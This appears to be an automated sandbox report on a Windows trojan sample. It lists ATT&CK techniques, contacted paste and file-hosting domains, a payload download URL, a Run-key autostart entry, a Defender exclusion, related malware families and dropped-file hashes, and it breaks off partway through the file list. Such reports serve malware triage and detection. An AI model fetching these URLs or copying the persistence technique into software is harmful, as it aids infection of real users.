MITRE ATT&CK matrix (techniques listed per tactic; a number in front of a technique is the count shown in that cell of the original matrix):
  • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
  • Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
  • Persistence: 1 Registry Run Keys / Startup Folder; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
  • Privilege Escalation: 11 Process Injection; 1 Registry Run Keys / Startup Folder; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
  • Defense Evasion: 11 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Obfuscated Files or Information; 1 Timestomp; Steganography
  • Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
  • Discovery: 1 Query Registry; 21 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 12 System Information Discovery
  • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
  • Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
  • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
  • Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Fallback Channels; Multiband Communication
  • Network Effects: Exploit SS7 to Redirect Phone Calls/SMS; SIM Card Swap
  • Remote Service Effects: Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
  • Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
  • Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
  • Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Behavior Graph ID: 1356250 | Sample: 9K25QyJ4hA.exe | Start date: 08/12/2023 | Architecture: WINDOWS | Score: 72
Contacted domains: paste.fo, oshi.at
Sample-level signatures: Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Machine Learning detection for sample
Process tree:
  • 9K25QyJ4hA.exe (started)
    • connects to oshi.at (5.253.86.15, port 443, local ports 49700 and 49706; HOSTSLICK-GERMANYNL, Cyprus)
    • connects to paste.fo (104.21.70.240, port 443, local ports 49699 and 49705; CLOUDFLARENETUS, United States)
    • signature: Adds a directory exclusion to Windows Defender
    • powershell.exe (started)
      • conhost.exe (started)
    • WerFault.exe (started)
  • 9K25QyJ4hA.exe (started)
    • powershell.exe (started)
      • conhost.exe (started)
    • WerFault.exe (started)
  • 9K25QyJ4hA.exe (started)
    • powershell.exe (started)
      • conhost.exe (started)
    • WerFault.exe (started)

Antivirus detection (Source | Detection | Scanner | Label):
9K25QyJ4hA.exe | 30% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
9K25QyJ4hA.exe | 100% | Avira | TR/Redcap.yqlbn
9K25QyJ4hA.exe | 100% | Joe Sandbox ML | -
No Antivirus matches
URL detection (Source | Detection | Scanner | Label):
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
http://crl.microsoft | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://oshi.at | 0% | Avira URL Cloud | safe
https://paste.fo/raw/015dbe46ef97T | 0% | Avira URL Cloud | safe
https://oshi.at/tqJAc/blueloqder.bin | 0% | Avira URL Cloud | safe
http://paste.fo | 0% | Avira URL Cloud | safe
https://oshi.at | 0% | Avira URL Cloud | safe
https://paste.fo/raw/015dbe46ef97 | 0% | Avira URL Cloud | safe
https://paste.fo | 0% | Avira URL Cloud | safe
http://oshi.atd | 0% | Avira URL Cloud | safe
http://paste.fod | 0% | Avira URL Cloud | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
oshi.at | 5.253.86.15 | true | false | - | unknown
paste.fo | 104.21.70.240 | true | false | - | unknown
URLs (Name | Malicious | Antivirus Detection | Reputation):
https://paste.fo/raw/015dbe46ef97 | false | Avira URL Cloud: safe | unknown
https://oshi.at/tqJAc/blueloqder.bin | false | Avira URL Cloud: safe | unknown
URLs found in memory or binary strings (Name | Source | Malicious | Antivirus Detection | Reputation):
http://oshi.atd | 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002830000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1328832036.0000000005BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1434744810.000000000577B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1517634097.00000000053EA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://oshi.at | 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002830000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000019.00000002.1504888944.00000000044D1000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.1325694764.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1425512865.0000000004862000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1504888944.00000000044D1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.1325694764.0000000004B71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1425512865.0000000004711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1504888944.0000000004381000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.microsoft | powershell.exe, 00000013.00000002.1439367542.00000000070E3000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000019.00000002.1504888944.00000000044D1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://paste.fo | 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.00000000027D2000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C52000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/somenonymous/OshiUpload | 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002BE6000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002889000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002806000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C88000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.1325694764.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1425512865.0000000004862000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1504888944.00000000044D1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000019.00000002.1517634097.00000000053EA000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1328832036.0000000005BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1434744810.000000000577B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1517634097.00000000053EA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 00000019.00000002.1517634097.00000000053EA000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000019.00000002.1517634097.00000000053EA000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://paste.fod | 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B43000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.00000000027E4000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://oshi.at | 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002810000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C92000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://paste.fo | 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B43000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.00000000027E4000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://upx.sf.net | Amcache.hve.7.dr | false | - | high
https://paste.fo/raw/015dbe46ef97T | 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002799000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1325694764.0000000004B71000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.00000000027D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1425512865.0000000004711000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1504888944.0000000004381000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000019.00000002.1504888944.00000000044D1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
104.21.70.240 | paste.fo | United States | 13335 | CLOUDFLARENETUS | false
5.253.86.15 | oshi.at | Cyprus | 208046 | HOSTSLICK-GERMANYNL | false
Joe Sandbox version: 38.0.0 Ammolite
Analysis ID: 1356250
Start date and time: 2023-12-08 14:35:00 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 23s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 37
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 9K25QyJ4hA.exe (renamed because original name is a hash value)
Original Sample Name: b5858b684b93cec0c56768fda67e721595bdfa7d14dbf45b74abbf686c9b66a2.exe
Detection: MAL
Classification: mal72.evad.winEXE@15/26@2/2
EGA Information:
  • Successful, ratio: 25%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 147
  • Number of non-executed functions: 8
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, SIHClient.exe, MoUsoCoreWorker.exe, backgroundTaskHost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 20.189.173.21, 52.168.117.173
  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target 9K25QyJ4hA.exe, PID 6780 because it is empty
  • Execution Graph export aborted for target 9K25QyJ4hA.exe, PID 7544 because it is empty
  • Execution Graph export aborted for target 9K25QyJ4hA.exe, PID 7964 because it is empty
  • Not all processes were analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • VT rate limit hit for: 9K25QyJ4hA.exe
Persistence and autostart (Time | Type | Description):
14:35:52 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BlockHost.exe C:\Users\user\Desktop\9K25QyJ4hA.exe
14:36:00 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BlockHost.exe C:\Users\user\Desktop\9K25QyJ4hA.exe
IP context (Match, then Associated Sample Name / URL | Detection | Threat Name):
104.21.70.240
  • https://hp49wqdw7g43qv1i4n88.nh6hd1s.ru/8tnf/ | malicious | Unknown
5.253.86.15
  • PAYMENT_RECEIPT_STAN100699.exe | malicious | Unknown
  • PAYMENT_RECEIPT_STAN100699.exe | malicious | Unknown
  • VGuSHbkIxk.exe | malicious | Amadey, Djvu, Fabookie, RedLine, SmokeLoader
  • wauCcRjr6j.exe | malicious | Djvu, RedLine, SmokeLoader
  • KvVXVfYvlF.exe | malicious | BlackGuard, SmokeLoader
  • BHHh.exe | malicious | Unknown
  • SCAN_DOC_003930_doc.exe | malicious | Unknown
  • PO_756380.js | malicious | Unknown
  • PO_756380.js | malicious | Unknown
  • nxIBGfk1rr.exe | malicious | RedLine
  • lvm.exe.exe | malicious | CobaltStrike
  • KJkj2S7Clo.exe | malicious | SmokeLoader
  • Draft_Document.exe | malicious | Unknown
  • file.exe | malicious | RedLine
Domain context (Match, then Associated Sample Name / URL | Detection | Threat Name | Context IP):
oshi.at
  • PAYMENT_RECEIPT_STAN100699.exe | malicious | Unknown | 5.253.86.15
  • PAYMENT_RECEIPT_STAN100699.exe | malicious | Unknown | 5.253.86.15
  • VGuSHbkIxk.exe | malicious | Amadey, Djvu, Fabookie, RedLine, SmokeLoader | 5.253.86.15
  • wauCcRjr6j.exe | malicious | Djvu, RedLine, SmokeLoader | 5.253.86.15
  • KvVXVfYvlF.exe | malicious | BlackGuard, SmokeLoader | 5.253.86.15
  • BHHh.exe | malicious | Unknown | 5.253.86.15
  • SCAN_DOC_003930_doc.exe | malicious | Unknown | 5.253.86.15
  • PO_756380.js | malicious | Unknown | 5.253.86.15
  • PO_756380.js | malicious | Unknown | 5.253.86.15
  • nxIBGfk1rr.exe | malicious | RedLine | 5.253.86.15
  • lvm.exe.exe | malicious | CobaltStrike | 5.253.86.15
  • KJkj2S7Clo.exe | malicious | SmokeLoader | 5.253.86.15
  • Draft_Document.exe | malicious | Unknown | 5.253.86.15
  • file.exe | malicious | RedLine | 5.253.86.15
  • rr.exe | malicious | RedLine | 51.68.141.111
  • HuJLbnfEq3.exe | malicious | Nymaim, RedLine | 51.68.141.111
  • b82af5f52e227885b6c58f785785481372a9432e415f4.exe | malicious | RedLine | 51.68.141.111
  • 5ASHKzytkq.exe | malicious | RedLine, Vidar | 51.68.141.111
  • Vde6wWF1N3.exe | malicious | RedLine | 51.68.141.111
ASN context (Match, then Associated Sample Name / URL | Detection | Threat Name | Context IP):
HOSTSLICK-GERMANYNL
  • COTAÇÃO MAGNA LTDA MFOC231877756745758450045Hemihedrism.exe | malicious | GuLoader, Remcos | 193.142.59.81
  • IMG_WAA00020237535050030500000324Ridderlfte.exe | malicious | GuLoader | 193.142.59.81
  • rCOTA____OMAGNA.exe | malicious | GuLoader, Remcos | 193.142.59.81
  • IMG-WAA023-202311027935732345535325453Generalisables.vbs | malicious | GuLoader, Remcos | 193.142.59.81
  • rCOTA____OMAGNALTDAMFOC231877756745758450045.exe | malicious | GuLoader, Remcos | 193.142.59.81
  • rIMG-WAA0211202.exe | malicious | GuLoader, Remcos | 193.142.59.81
  • SecuriteInfo.com.Win32.RATX-gen.21306.22425.exe | malicious | Remcos | 193.142.59.240
  • PAYMENT_RECEIPT_STAN100699.exe | malicious | Unknown | 5.253.86.15
  • PAYMENT_RECEIPT_STAN100699.exe | malicious | Unknown | 5.253.86.15
  • Yegdeajzb.exe | malicious | Remcos | 193.142.59.240
  • PRICE_CHART_AND_MORE_DETAILS.exe | malicious | Remcos | 193.142.59.6
  • ZH-SA_5012023.exe | malicious | Remcos, GuLoader | 193.142.59.6
  • file.exe | malicious | Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader | 193.142.59.12
  • file.exe | malicious | Amadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader | 193.142.59.12
  • 8t7XJHwvkR.exe | malicious | LummaC Stealer, SmokeLoader | 193.142.59.12
  • file.exe | malicious | Amadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader | 193.142.59.12
  • file.exe | malicious | Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar | 193.142.59.12
  • file.exe | malicious | Amadey, Babuk, Djvu, RedLine, SmokeLoader | 193.142.59.12
  • file.exe | malicious | Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar | 193.142.59.12
CLOUDFLARENETUS
  • 68pT93HY5R.exe | malicious | Unknown | 104.21.84.67
  • https://ndlc.us21.list-manage.com/track/click?u=c019ce2ced9d9c49756fb7da7&id=21b55f31be&e=398702c985 | malicious | HTMLPhisher | 104.21.80.18
  • svo0k2D8I1.exe | malicious | FormBook | 104.21.90.183
  • https://ndlc.us21.list-manage.com/track/click?u=c019ce2ced9d9c49756fb7da7&id=21b55f31be&e=398702c985 | malicious | HTMLPhisher | 104.21.80.18
  • Payment_45832.html | malicious | Unknown | 104.18.7.145
                                                        https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=Ebb0j5QjXU-qQZYFfJozDJWY2o9D5BtLjngmk2mcQBRUQjVGQ1czU1BKSEZESVo0VENZT0UxR1dQQy4u&vt=8ff4b611-2394-4f5d-aa41-96057c9a330c_898deb5f-42fb-4f38-8d3d-fdd88a6aeed6_638376144220000000_EUR_Hash_MiEjQryDmSP0Q5%2bsfWmmkF1mqEGpCWipqllkfFFe3vg%3d&lang=en-usGet hashmaliciousHTMLPhisherBrowse
                                                        • 104.17.2.184
                                                        xyoRhY7Rkm.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 162.159.137.232
                                                        Order_NO.Z21239.jsGet hashmaliciousRemcosBrowse
                                                        • 172.67.215.45
                                                        K25Eh2b6Mb.exeGet hashmaliciousFormBookBrowse
                                                        • 104.21.13.73
                                                        n5PW3tuGlp.exeGet hashmaliciousFormBookBrowse
                                                        • 172.67.169.151
                                                        file.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5SystemzBrowse
                                                        • 172.67.135.47
                                                        https://i.nupem.ufrj.br/Jakro_7DJSDGet hashmaliciousHTMLPhisherBrowse
                                                        • 104.21.80.104
                                                        SecuriteInfo.com.HEUR.Trojan.MSIL.Agent.gen.12009.5536.exeGet hashmaliciousAsyncRAT, Clipboard HijackerBrowse
                                                        • 162.159.135.233
                                                        kJQ1ZHLjG3.exeGet hashmaliciousUnknownBrowse
                                                        • 104.21.31.179
                                                        kJQ1ZHLjG3.exeGet hashmaliciousUnknownBrowse
                                                        • 104.21.31.179
                                                        Google_Gemini_AI_Ultra_v1.msiGet hashmaliciousUnknownBrowse
                                                        • 172.64.41.3
                                                        file.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5SystemzBrowse
                                                        • 172.67.196.133
                                                        http://arsyology.xyz/gYefq09Get hashmaliciousUnknownBrowse
                                                        • 104.26.9.44
                                                        https://t.co/XbiWikRFDeGet hashmaliciousPhisherBrowse
                                                        • 104.21.80.104
                                                        Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                        No context
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.1841070509808507
                                                        Encrypted:false
                                                        SSDEEP:192:JT+kGDdOf0BU/KayHFA/fkzuiF2Z24IO86:t8DdlBU/KaQq3kzuiF2Y4IO86
                                                        MD5:9B59C50D2CA0A20D8A3ED83E23A2B628
                                                        SHA1:ECFE164455E7D63AE2ABB3EF3E2437A80D602962
                                                        SHA-256:0A4F293F8CA653C21FAC6CFE98B43FD5CC7436B44BBD77DE1ACD9F974955ADD6
                                                        SHA-512:BF5DF35C7F0B9C5D840840474B9DFF54FC701704B01D214A80EB010316ABEE73BA9C6A2FB5D05CDD46E661F19DA1FC14F792A3ACEE785F09B7A2AAF2311B0B3B
                                                        Malicious:false
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.1902060499074274
                                                        Encrypted:false
                                                        SSDEEP:192:PO6kGDMOf0BU/Ka+nyENNtzuiF2Z24IO86:WgDMlBU/KaVENtzuiF2Y4IO86
                                                        MD5:0AB589C5F261901FD6FE97F00C8ABD64
                                                        SHA1:EEE74D15BA143617C6956DC897939C21C7F80AAA
                                                        SHA-256:27568082FD0BACBA24C30645FA9A547480A209ADD97C0C984124A730D3B04DFF
                                                        SHA-512:47819EB74DFC836200804BD0C2301D5D5C479EEA7ABECBD8D927B049F05ABE729F96E774E4DCCFB88CFFD1B154A41B94264833587ECCA757C0F2DE8054F5B221
                                                        Malicious:false
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.1840645100877396
                                                        Encrypted:false
                                                        SSDEEP:192:91a2fkGDEOf0BU/KaiHFA/fkzuiF2Z24IO86:/a2ZDElBU/Kagq3kzuiF2Y4IO86
                                                        MD5:FE7200D9D53DB298E3F800627D4D5F41
                                                        SHA1:A6A41F8EA7345518F87D87F2FA1CFDBACEDBF357
                                                        SHA-256:600CF291805E34CD49C48F80F3620955E330B1042137B85825DB8C92ED5A6C6E
                                                        SHA-512:B3BDBD91A3F214F673A67F6A9554B887C68EB736B4634F10883AF9B2E34D1BCE2147D4CABFBF6E67FB5BC79D4BA71E308C9252DADE77EC2011F3162AC15896F6
                                                        Malicious:false
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Mini DuMP crash report, 15 streams, Fri Dec 8 13:35:55 2023, 0x1205a4 type
                                                        Category:dropped
                                                        Size (bytes):359121
                                                        Entropy (8bit):3.4420944871419845
                                                        Encrypted:false
                                                        SSDEEP:3072:uwuyo274QSgqIW49VpkgIj60phZYc4uEqQYvLTgVQ4:uryo5Qqz4jp1Ij3Yc45cTgV
                                                        MD5:59738C0F23A904B7C010D2C201421ACB
                                                        SHA1:E35513333E233248DAEBC1437D6899FEA60F6F8B
                                                        SHA-256:6A25F62402576CB535DE70A49ACE70E4F78937BF5FDA5D0675DFE94B8FC4CBAF
                                                        SHA-512:5EB9A0D809A4696C1733324CDBCEB4596B77244E8B376041CBB1CA36F695B5769F8D5E3A7B3665D6D464132E24EEF7CC4DFA013077F24E05D65BC2521B9FEE38
                                                        Malicious:false
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):8398
                                                        Entropy (8bit):3.6987304757904917
                                                        Encrypted:false
                                                        SSDEEP:192:R6l7wVeJin6m6YNaSU9kdgmfZUlpr789bGRsf0dim:R6lXJy6m6YgSU9kdgmfWUGKfQ
                                                        MD5:315199879D4059A943406ADEA1F2573E
                                                        SHA1:19494DC21F4BC2A962B2CB2D2038E92778B9C074
                                                        SHA-256:230F9F56B867B2C9CB2DC8356D0DC6698A519F51A96838EDD4A701282515D2A6
                                                        SHA-512:613B1E00A8A5C3D6A58F244566FE6A64728973FF55C0F1DD3FEB7E8A2688F2AE4B1BA6CD4D06DAF82A086D85CA906C6ED8447D6389AE5134456ED859078828DA
                                                        Malicious:false
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):4774
                                                        Entropy (8bit):4.478332924469556
                                                        Encrypted:false
                                                        SSDEEP:48:cvIwWl8zswJg77aI9OZWpW8VYjYm8M4JzrFD+r+q8v7sDv3tTd:uIjf2I74o7VrJ9+rKAj3tTd
                                                        MD5:5C7D970C137D7D8EC7750570704B5B14
                                                        SHA1:33FB75EB3E5354ED723058C5E007C9BCF812107F
                                                        SHA-256:65F6DD48C28EA7DA7FD2DF88D90B9E19A204D9EAF401CC81B78EBAF2DC558F98
                                                        SHA-512:F0948A674C63FC8D2167B12538D096A64158F3951733BC00838B27C734AA844102AB9D248179D5277664AD1B918CB10B54C3BAEB14C2D3D7C079DDE9F738866B
                                                        Malicious:false
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Mini DuMP crash report, 15 streams, Fri Dec 8 13:36:04 2023, 0x1205a4 type
                                                        Category:dropped
                                                        Size (bytes):366341
                                                        Entropy (8bit):3.383380929352294
                                                        Encrypted:false
                                                        SSDEEP:3072:b9pzyaEcnCaNya9IExM04m6g4uEqQgQLTgYjMCjM:b9NyaEcCar9bxM04m6g45g2TgYgCj
                                                        MD5:E7ABAB61A53C56B13F2992BF966205CA
                                                        SHA1:2BD9BD236931AA60EB4C5352909E20A729EDA842
                                                        SHA-256:F69F86B2EC696137C0B690C0F97DCC1CF97BDA8D4811555C489DCEF5142CC2B7
                                                        SHA-512:7DA97E626E6F36F360E23F57EEEC71C363BEF1EFB66D8817AB033F3DE29FE689E63FC0D45F15F9FAE0CF96F1D9DCB2BA02910AC4CC87611E7ED7B35F7DFA7F26
                                                        Malicious:false
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):8398
                                                        Entropy (8bit):3.700066148241754
                                                        Encrypted:false
                                                        SSDEEP:192:R6l7wVeJps6E6YNnSU9MonPgmfZUlprt89bJ3dZsfJDm:R6lXJy6E6YNSU9MAgmfWCJ3dyfw
                                                        MD5:AF16789CCD16ED6661309E967007E0FD
                                                        SHA1:E7167041AD13201081E8F2AB8A5CDB2994A4EBB8
                                                        SHA-256:9ADA92D2B0C05CE67B9BF1C79D1ABB0B0AA1D1CBE8507DD475C4051B7EE49BEB
                                                        SHA-512:FC4B373314C67A141F3B0F56398B5D01D154A011A3A7C238011237A45AF95C74BEE42ED591EEE021361C0C7C755D53105E6B7A08E65C51A3C7E4557CA3B81BC7
                                                        Malicious:false
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):4774
                                                        Entropy (8bit):4.482121217151095
                                                        Encrypted:false
                                                        SSDEEP:48:cvIwWl8zswJg77aI9OZWpW8VY2Ym8M4JzrFHQ+q8v7ODv3QTd:uIjf2I74o7VqJOKqj3QTd
                                                        MD5:A021C83BAEF807039F4A9C7CF7B9BDED
                                                        SHA1:8DB9FC49415EB9987AE8216245F097D91C82C88F
